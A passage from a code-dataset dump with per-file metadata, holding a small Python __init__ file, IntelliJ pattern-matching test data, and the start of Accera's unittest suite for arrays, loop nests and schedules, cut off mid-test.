| 46.385714 | 79 | 0.559285 | 12,622 | 110,398 | 4.612423 | 0.031136 | 0.093992 | 0.07709 | 0.044007 | 0.883833 | 0.853654 | 0.82021 | 0.792762 | 0.754543 | 0.718558 | 0 | 0.017345 | 0.313276 | 110,398 | 2,379 | 80 | 46.405212 | 0.75057 | 0.028868 | 0 | 0.699416 | 0 | 0 | 0.056937 | 0.000196 | 0 | 0 | 0 | 0.000841 | 0.156128 | 1 | 0.076362 | false | 0.02821 | 0.004377 | 0.000486 | 0.085603 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
228a4a5fe5c49ac9f8b18fd284282c07016ae67a | 27 | py | Python | relart/cross_validation/__init__.py | artemmoskalev/relart | 8c1d063bdcfd2bdb5558df3de770014db4c2b130 | [
"MIT"
] | null | null | null | relart/cross_validation/__init__.py | artemmoskalev/relart | 8c1d063bdcfd2bdb5558df3de770014db4c2b130 | [
"MIT"
] | null | null | null | relart/cross_validation/__init__.py | artemmoskalev/relart | 8c1d063bdcfd2bdb5558df3de770014db4c2b130 | [
"MIT"
] | null | null | null | from .grid_search import *
| 13.5 | 26 | 0.777778 | 4 | 27 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
22af4591d6c294f51d1b6669523502f70637a695 | 233 | py | Python | python/testData/psi/PatternMatchingMappingPatterns.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | python/testData/psi/PatternMatchingMappingPatterns.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | python/testData/psi/PatternMatchingMappingPatterns.py | 06needhamt/intellij-community | 63d7b8030e4fdefeb4760e511e289f7e6b3a5c5b | [
"Apache-2.0"
] | null | null | null | match x:
case {}:
pass
case {"foo": 1}:
pass
case {"foo": 1,}:
pass
case {"foo": {"bar": []}}:
pass
case {"foo": 1, "bar": 2}:
pass
case {"foo": 1, **args}:
pass | 17.923077 | 30 | 0.360515 | 27 | 233 | 3.111111 | 0.333333 | 0.47619 | 0.654762 | 0.571429 | 0.416667 | 0.416667 | 0.416667 | 0 | 0 | 0 | 0 | 0.037594 | 0.429185 | 233 | 13 | 31 | 17.923077 | 0.593985 | 0 | 0 | 0.461538 | 0 | 0 | 0.089744 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.461538 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
22b27d03fe5a62ee97949f41248326416077dff9 | 121,582 | py | Python | accera/python/accera/test/dsl_tests.py | Arslan-e-Mustafa/Accera | d5e39f3eac6cee86e1f6ad8e14bf5b776062569f | [
"MIT"
] | null | null | null | accera/python/accera/test/dsl_tests.py | Arslan-e-Mustafa/Accera | d5e39f3eac6cee86e1f6ad8e14bf5b776062569f | [
"MIT"
] | null | null | null | accera/python/accera/test/dsl_tests.py | Arslan-e-Mustafa/Accera | d5e39f3eac6cee86e1f6ad8e14bf5b776062569f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
####################################################################################################
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root for license information.
####################################################################################################
# Tip: to run a particular test / set of tests:
# python -m unittest discover -k "test_input_array" path_to_accera/test dsl_tests.py
# python -m unittest discover -k "DSLTest_01" path_to_accera/test dsl_tests.py
import logging
import sys
import unittest
import os
import pathlib
import numpy as np
from enum import Enum
from typing import Callable, Tuple
DEV_MODE = False
if "@CMAKE_INSTALL_PREFIX@"[1:-1] != "CMAKE_INSTALL_PREFIX":
sys.path.insert(1, "@CMAKE_INSTALL_PREFIX@")
else:
DEV_MODE = True
sys.path.insert(1, os.getcwd())
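# Note: "@CMAKE_INSTALL_PREFIX@" above is a CMake configure-time placeholder;
# in an installed build it is presumably substituted with the real install
# prefix, so the comparison distinguishes installed runs (import from the
# install prefix) from in-tree DEV_MODE runs (import from the cwd).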
from accera import ScalarType, Array, Function, Nest, Target, Package
from accera.test import verifiers
TEST_MODE = Package.Mode.DEBUG if DEV_MODE else Package.Mode.RELEASE
TEST_FORMAT = Package.Format.MLIR_DYNAMIC if DEV_MODE else Package.Format.HAT_DYNAMIC
TEST_PACKAGE_DIR = "test_acccgen"
# Groups of types commonly used for tests
INT_TYPES = [
ScalarType.int8, ScalarType.int16, ScalarType.int32, ScalarType.int64, ScalarType.uint8, ScalarType.uint16,
ScalarType.uint32, ScalarType.uint64
]
FLOAT_TYPES = [ScalarType.float16, ScalarType.float32, ScalarType.float64]
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
os.environ["OMP_DISPLAY_AFFINITY"] = "TRUE"
# TODO: Remove all @expectedFailure decorators as implementation converges with spec
class FailedReason(Enum):
NOT_IN_CORE = "Not yet implemented (core)"
NOT_IN_PY = "Not yet implemented (python)"
UNKNOWN = "Unknown failure"
BUG = "Bug"
def expectedFailure(reason: FailedReason, msg: str, condition: bool = True) -> Callable:
"Extends the unittest.expectedFailure decorator to print failure details and takes an optional condition"
def _decorator(func):
@unittest.expectedFailure
def _wrapper(x):
print(f"\n{reason.value}: {msg}")
try:
return func(x)
except Exception as e:
print(f"\t{e}\n")
raise (e)
return _wrapper if condition else func
return _decorator
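# Usage sketch for the decorator above (hypothetical test, not part of this
# suite): the wrapper prints the failure reason before re-raising, and the
# optional condition lets the expected failure apply selectively, e.g.:
#
#   class Example(unittest.TestCase):
#       @expectedFailure(FailedReason.NOT_IN_PY, "feature X not exposed",
#                        condition=sys.platform == "win32")
#       def test_feature_x(self):
#           ...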
class DSLTest_01Arrays(unittest.TestCase):
def _verify_nest(self, nest, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
# create a HAT package and add the function to it
package = Package()
function = package.add(nest, args, base_name=package_name)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_input_array(self) -> None:
A = Array(shape=(10, 20), role=Array.Role.INPUT, element_type=ScalarType.float32)
self.assertIsNotNone(A)
def test_input_array_standard_layout(self) -> None:
A = Array(shape=(10, 20), role=Array.Role.INPUT, layout=Array.Layout.LAST_MAJOR)
# A = Array(shape=(10, 20), layout=Array.Layout.LAST_MAJOR, role=Array.Role.INPUT, element_type=ScalarType.float32)
self.assertIsNotNone(A)
def test_input_array_dimension_layout(self) -> None:
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20), layout=(1, 10))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20), layout=(10, 1))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, ), layout=(1, ))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(1, 10, 200))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(200, 10, 1))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(1, 200, 10))
self.assertIsNotNone(A)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(10, 20, 50), layout=(10, 200, 1))
self.assertIsNotNone(A)
def test_input_array_infinite_major_dimension(self) -> None:
from accera import inf
with self.assertRaises(ValueError):
Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(inf, inf))
A = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(10, inf))
self.assertIsNotNone(A)
self.assertEqual(A.shape[1], inf)
nest = Nest(shape=(10, 16))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] += A[i, j]
package = Package()
package.add(nest, (A, ), base_name="inf_test")
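# adding the function fixes the unbounded extent: the inf dimension of A is
# resolved to the nest's corresponding extent (16), verified below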
self.assertEqual(A.shape[1], 16)
package_name = "input_array_inf_test"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_input_output_array(self) -> None:
A = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(10, 20))
self.assertIsNotNone(A)
def test_const_array(self) -> None:
for dt in [
bool, # np.bool is deprecated in favor of bool
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
np.float16,
np.float32,
np.float64
]:
D = np.ones((128, 256), dtype=dt)
A = Array(role=Array.Role.CONST, data=D)
self.assertIsNotNone(A)
def test_const_array_type_layout(self) -> None:
D = np.ones((128, 256), dtype=np.float64)
for t in [ScalarType.bool] + INT_TYPES + FLOAT_TYPES:
A = Array(role=Array.Role.CONST, element_type=t, layout=Array.Layout.LAST_MAJOR, data=D)
self.assertIsNotNone(A)
def test_temp_array(self) -> None:
A = Array(role=Array.Role.TEMP, element_type=ScalarType.float32, layout=Array.Layout.LAST_MAJOR, shape=(10, 20))
self.assertIsNotNone(A)
B = Array(
role=Array.Role.TEMP, element_type=ScalarType.float32, layout=Array.Layout.FIRST_MAJOR, shape=(10, 20)
)
self.assertIsNotNone(B)
def test_temp_array_materialization_1(self) -> None:
# Materializes (allocates) a TEMP array externally to an added function
def make_test_fn(package, A, B, C):
T = Array(role=Array.Role.TEMP, element_type=A.element_type, shape=A.shape)
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
T[i, j] = A[i, j] + B[i, j]
C[i, j] += T[i, j]**2.
return package.add(nest, args=(A, B, C))
A = Array(shape=(256, 32), role=Array.Role.INPUT)
B = Array(shape=(256, 32), role=Array.Role.INPUT)
C = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
package = Package()
make_test_fn(package, A, B, C)
package_name = "test_temp_array_materialization_1"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_temp_array_materialization_2(self) -> None:
# Materializes (allocates) a TEMP array within an added function
package = Package()
A = Array(shape=(256, 32), role=Array.Role.INPUT)
B = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
def make_init_function(package, A):
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 3.14
return package.add(nest, args=(A, ))
init_fn = make_init_function(package, B)
def make_helper_function2(package, A, B):
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j] * 2.
return package.add(nest, args=(A, B))
helper_fn2 = make_helper_function2(package, A, B)
def test_fn(A, B):
T = Array(role=Array.Role.TEMP, element_type=A.element_type, shape=A.shape)
init_fn(T)
helper_fn2(T, B)
helper_fn2(A, B)
package.add(test_fn, args=(A, B))
package_name = "test_temp_array_materialization_2"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fn_wrong_role(A, B):
T = Array(role=Array.Role.INPUT_OUTPUT, element_type=A.element_type, shape=A.shape)
init_fn(T)
helper_fn2(T, B)
helper_fn2(A, B)
package.add(test_fn_wrong_role, args=(A, B))
package_name = "test_temp_array_materialization_2_wrong_role"
with self.assertRaises(ValueError):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_temp_array_materialization_3(self) -> None:
# Materializes (allocates) a TEMP array within some nest iteration logic
# *without* passing the array as a function argument
package = Package()
A = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
B = Array(shape=(256, 32), role=Array.Role.INPUT_OUTPUT)
nest = Nest(A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
T = Array(role=Array.Role.TEMP, element_type=A.element_type, shape=(1, ))
# TODO: inject via introspection if we need to support this scenario
T._allocate()
T = T._get_native_array()
T[0] = B[i, j]
B[i, j] += A[i, j] * 2.
A[i, j] = T[0]
package.add(nest, args=(A, B))
package_name = "test_temp_array_materialization_3"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_first_major_array_access(self) -> None:
A = Array(shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.FIRST_MAJOR)
nest = Nest(shape=(256, 32))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 5.0
A_test = np.random.random((256, 32)).astype(np.float32)
A_expected = np.ndarray((256, 32)).astype(np.float32)
A_expected.fill(5.0)
correctness_check_values = {
"pre": (A_test, ),
"post": (A_expected, )
}
self._verify_nest(
nest, (A, ), "test_first_major_array_access", correctness_check_values=correctness_check_values
)
def test_last_major_array_access(self) -> None:
A = Array(shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.LAST_MAJOR)
nest = Nest(shape=(256, 32))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 5.0
A_test = np.random.random((256, 32)).astype(np.float32, order="F")
A_expected = np.ndarray((256, 32)).astype(np.float32, order="F")
A_expected.fill(5.0)
correctness_check_values = {
"pre": (A_test, ),
"post": (A_expected, )
}
self._verify_nest(
nest, (A, ), "test_last_major_array_access", correctness_check_values=correctness_check_values
)
def test_array_value_type_cast(self) -> None:
A = Array(shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.FIRST_MAJOR)
B = Array(
shape=(256, 32), role=Array.Role.INPUT, layout=Array.Layout.FIRST_MAJOR, element_type=ScalarType.int32
)
nest = Nest(shape=(256, 32))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] = 5 # implicit cast from int8 to float
B[i, j] = 10 # implicit cast from int8 to int32
A_test = np.random.random((256, 32)).astype(np.float32)
A_expected = np.ndarray((256, 32)).astype(np.float32)
A_expected.fill(5.0)
B_test = np.random.random((256, 32)).astype(np.int32)
B_expected = np.ndarray((256, 32)).astype(np.int32)
B_expected.fill(10)
correctness_check_values = {
"pre": (A_test, B_test),
"post": (A_expected, B_expected)
}
self._verify_nest(nest, (A, B), "test_array_value_type_cast", correctness_check_values=correctness_check_values)
def test_subarray(self) -> None:
package = Package()
arr = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(256, 256))
arr0 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
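# a sub-array is presumably a view into the parent buffer: it keeps the
# parent's strides while exposing the smaller 128x128 shape, so its layout
# (printed below) differs from that of a standalone 128x128 array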
self.assertEqual(arr0.shape, [128, 128])
self.assertEqual(arr0.element_type, arr.element_type)
print(arr0.layout)
# add a function that utilizes a subarray layout
def make_subarray_fn(arr0):
nest = Nest(shape=arr0.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
arr0[i, j] += 1.
return package.add(nest, args=(arr0, ))
subarray_fn = make_subarray_fn(arr0)
# add a function that instantiates a subarray of the input array and calls the function above
def main(arr):
arr1 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
print(arr1.layout)
self.assertEqual(arr0.layout, arr1.layout)
subarray_fn(arr1)
package.add(main, args=(arr, ))
package_name = "test_subarray"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_subarray_l2(self) -> None:
package = Package()
arr = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(256, 256))
arr0 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
self.assertEqual(arr0.shape, [128, 128])
self.assertEqual(arr0.element_type, arr.element_type)
arr00 = arr0.sub_array(offsets=(64, 64), shape=(64, 64))
self.assertEqual(arr00.shape, [64, 64])
self.assertEqual(arr00.element_type, arr0.element_type)
# add a function that utilizes a subarray layout
def make_fn(A):
nest = Nest(shape=A.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] += 1.
return package.add(nest, args=(A, ))
subarray_fn = make_fn(arr0)
subarray_fn1 = make_fn(arr00)
# add a function that instantiates a subarray of the input array and calls the function above
def main(arr):
arr1 = arr.sub_array(offsets=(0, 0), shape=(128, 128))
arr11 = arr1.sub_array(offsets=(64, 64), shape=(64, 64))
print(f"{arr1.layout}\n{arr11.layout}")
self.assertEqual(arr0.layout, arr1.layout)
self.assertEqual(arr00.layout, arr11.layout)
subarray_fn(arr1)
subarray_fn1(arr11)
package.add(main, args=(arr, ))
package_name = "test_subarray_l2"
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
class DSLTest_02SimpleAffineLoopNests(unittest.TestCase):
def _create_nest(self, shape: Tuple[int], type=ScalarType.float32) -> Tuple:
# helper function to create a nest so that we can focus on the logic function
M, N, S = shape
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(role=Array.Role.INPUT, element_type=type, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
return Nest(shape=(M, N, S)), A, B, C
def _build_nest(self, nest, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
# helper function to build a nest so that we can focus on the logic function
# create a HAT package and add the nest to it
package = Package()
function = package.add(nest, args, base_name=package_name)
# build the HAT package
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_signed_types(self) -> None:
for t in [ScalarType.int16, ScalarType.int32, ScalarType.int64] + FLOAT_TYPES:
A = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
B = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=t, shape=(16, 16))
nest = Nest(shape=(16, 16))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, j] + B[i, j]
C[i, j] += A[i, j] - B[i, j]
C[i, j] += A[i, j] * B[i, j]
C[i, j] += A[i, j] / B[i, j]
dtype = np.dtype(t.name)
A_test = np.random.random(A.shape).astype(dtype)
B_test = np.ones((C.shape)).astype(dtype) # avoid divide by zero
C_test = np.random.random(C.shape).astype(dtype)
C_ref = C_test + A_test + B_test
C_ref = C_ref + A_test - B_test
C_ref = C_ref + A_test * B_test
C_ref = C_ref + A_test / B_test
if t == ScalarType.float16: # TODO: verification issue with correctness check?
correctness_check_values = None
else:
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._build_nest(nest, [A, B, C], f"test_types_{t.name}", correctness_check_values)
def test_unsigned_types(self) -> None:
for t in [ScalarType.uint8, ScalarType.uint16, ScalarType.uint32, ScalarType.uint64]:
A = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
B = Array(role=Array.Role.INPUT, element_type=t, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=t, shape=(16, 16))
nest = Nest(shape=(16, 16))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, j] + B[i, j]
C[i, j] += A[i, j] - B[i, j]
C[i, j] += A[i, j] * B[i, j]
C[i, j] += A[i, j] / B[i, j]
dtype = np.dtype(t.name)
A_test = np.random.random(A.shape).astype(dtype)
B_test = np.ones((C.shape)).astype(dtype) # avoid divide by zero
C_test = np.random.random(C.shape).astype(dtype)
C_ref = C_test + A_test + B_test
C_ref = C_ref + A_test - B_test
C_ref = C_ref + A_test * B_test
C_ref = C_ref + A_test / B_test
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_ref]
}
self._build_nest(nest, [A, B, C], f"test_types_{t.name}", correctness_check_values)
def test_arithmetic_operations(self) -> None:
for t in INT_TYPES + FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] = A[i, k] + B[k, j] # test assignment
C[i, j] += A[i, k] - B[k, j]
C[i, j] += A[i, k] * B[k, j]
C[i, j] += A[i, k] / B[k, j]
C[i, j] += -A[i, k]
C[i, j] += A[i, k] // B[k, j]
C[i, j] += A[i, k] % B[k, j]
C[i, j] += A[i, k]**B[k, j]
self._build_nest(nest, [A, B, C], f"test_arithmetic_operations_{t.name}")
def test_relational_operations(self) -> None:
from accera._lang_python._lang import _If
for t in [ScalarType.bool] + INT_TYPES + FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
def f1():
C[i, j] += A[i, k] + B[k, j]
def f2():
C[i, j] -= A[i, k] + B[k, j]
def f3():
C[i, j] *= A[i, k] + B[k, j]
def f4():
C[i, j] /= A[i, k] + B[k, j]
# BUGBUG: this syntax probably needs to change
_If(A[i, k] == B[k, j], f1)
_If(A[i, k] != B[k, j], f2)
_If(A[i, k] < B[k, j], f3)
_If(A[i, k] <= B[k, j], f4)
_If(A[i, k] > B[k, j], f1)
_If(A[i, k] >= B[k, j], f2)
self._build_nest(nest, [A, B, C], f"test_relational_operations_{t.name}")
def test_logical_operations(self) -> None:
from accera import logical_and, logical_or, logical_not
for t in [ScalarType.bool] + INT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += logical_not(A[i, k])
C[i, j] += logical_and(A[i, k], B[k, j])
C[i, j] += logical_or(A[i, k], B[k, j])
self._build_nest(nest, [A, B, C], f"test_logical_operations_{t.name}")
def test_bitwise_operations(self) -> None:
for t in INT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += B[j, k] >> 1
C[i, j] += A[i, j] << 2
C[i, j] += A[i, j] & B[j, k]
C[i, j] += A[i, j] | B[j, k]
C[i, j] += A[i, j] ^ B[j, k]
C[i, j] += ~A[i, j]
self._build_nest(nest, [A, B, C], f"test_bitwise_operations_{t.name}")
def test_intrinsics(self) -> None:
from accera import max, min
for t in INT_TYPES + FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += max(A[i, j], B[j, k])
C[i, j] += min(A[i, j], B[j, k])
self._build_nest(nest, [A, B, C], f"test_intrinsics_{t.name}")
def test_intrinsics_float(self) -> None:
from accera import abs, sqrt, exp, log, log10, log2, sin, cos, ceil, floor, tan, cosh, sinh, tanh
# from accera._lang_python import fast_exp, fast_exp_mlas
for t in FLOAT_TYPES:
nest, A, B, C = self._create_nest((16, 10, 11), type=t)
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += abs(A[i, j])
C[i, j] += exp(A[i, j])
# C[i, j] += fast_exp(A[i, j])
# C[i, j] += fast_exp_mlas(A[i, j])
C[i, j] += log(B[j, k])
C[i, j] += log2(B[j, k])
C[i, j] += log10(A[i, j])
C[i, j] += sin(A[i, j])
C[i, j] += cos(B[j, k])
C[i, j] += tan(A[i, j])
C[i, j] += sqrt(B[j, k])
C[i, j] += ceil(B[j, k])
C[i, j] += floor(A[i, j])
C[i, j] += sinh(A[i, j])
C[i, j] += cosh(B[j, k])
C[i, j] += tanh(A[i, j])
self._build_nest(nest, [A, B, C], f"test_intrinsics_float_{t.name}")
def test_convenience_syntax_1(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] + B[k, j]
package = Package()
package_name = "test_convenience_syntax_1"
package.add(nest, args=(A, B, C), base_name="matmul")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_convenience_syntax_2(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
plan = nest.create_plan()
package = Package()
package_name = "test_convenience_syntax_2"
package.add(plan, args=(A, B, C), base_name="matmul")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
class DSLTest_03Schedules(unittest.TestCase):
def _create_nest(self, shape: Tuple[int], type=ScalarType.float32) -> Tuple:
M, N, S = shape
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(role=Array.Role.INPUT, element_type=type, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
return Nest(shape=(M, N, S)), A, B, C
def _verify_schedule(self, schedule, args: Tuple[Array], package_name, correctness_check_values=None) -> None:
# create a HAT package and add the function to it
package = Package()
function = package.add(schedule, args, base_name="schedule_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_schedule_reorder(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
schedule.reorder(k, i, j)
self.assertEqual(schedule._indices, [k, i, j])
schedule.reorder(order=(j, i, k))
self.assertEqual(schedule._indices, [j, i, k])
self._verify_schedule(schedule, [A, B, C], "test_schedule_reorder")
def test_schedule_split(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 4)
iii = schedule.split(i, 2)
iiii = schedule.split(ii, 2)
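# each split inserts the new inner index immediately after its parent:
# i -> (i, ii), then i -> (i, iii) and ii -> (ii, iiii), which yields the
# [i, iii, ii, iiii, j, k] order asserted below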
for index in [ii, iii, iiii]:
self.assertIsNotNone(index)
self.assertEqual(schedule._indices, [i, iii, ii, iiii, j, k])
self._verify_schedule(schedule, [A, B, C], "test_schedule_split1")
# split size does not divide the dimension size
schedule2 = nest.create_schedule()
kk = schedule2.split(k, 4) # original size of dimension k was 11
self.assertIsNotNone(kk)
self.assertEqual(schedule2._indices, [i, j, k, kk])
self._verify_schedule(schedule2, [A, B, C], "test_schedule_split2")
# split size == dimension size
schedule3 = nest.create_schedule()
kk = schedule3.split(k, 11) # original size of dimension k was 11
self.assertIsNotNone(kk)
self.assertEqual(schedule3._indices, [i, j, k, kk])
self._verify_schedule(schedule3, [A, B, C], "test_schedule_split3")
# split size > dimension size
schedule4 = nest.create_schedule()
kk = schedule4.split(k, 13) # original size of dimension k was 11
self.assertIsNotNone(kk)
self.assertEqual(schedule4._indices, [i, j, k, kk])
self._verify_schedule(schedule4, [A, B, C], "test_schedule_split4")
def test_schedule_set_invalid_order(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 2)
iii = schedule.split(ii, 2)
jj = schedule.split(j, 5)
self.assertEqual(schedule._indices, [i, ii, iii, j, jj, k])
with self.assertRaises(ValueError):
schedule.reorder(k, i, jj, j)
self.assertEqual(schedule._indices, [i, ii, iii, j, jj, k])
with self.assertRaises(ValueError):
schedule.reorder(k, ii, iii, j, jj, i)
self.assertEqual(schedule._indices, [i, ii, iii, j, jj, k])
schedule.reorder(i, j, ii, jj, iii, k)
self.assertEqual(schedule._indices, [i, j, ii, jj, iii, k])
def test_schedule_tile(self) -> None:
nest, A, B, C = self._create_nest((16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
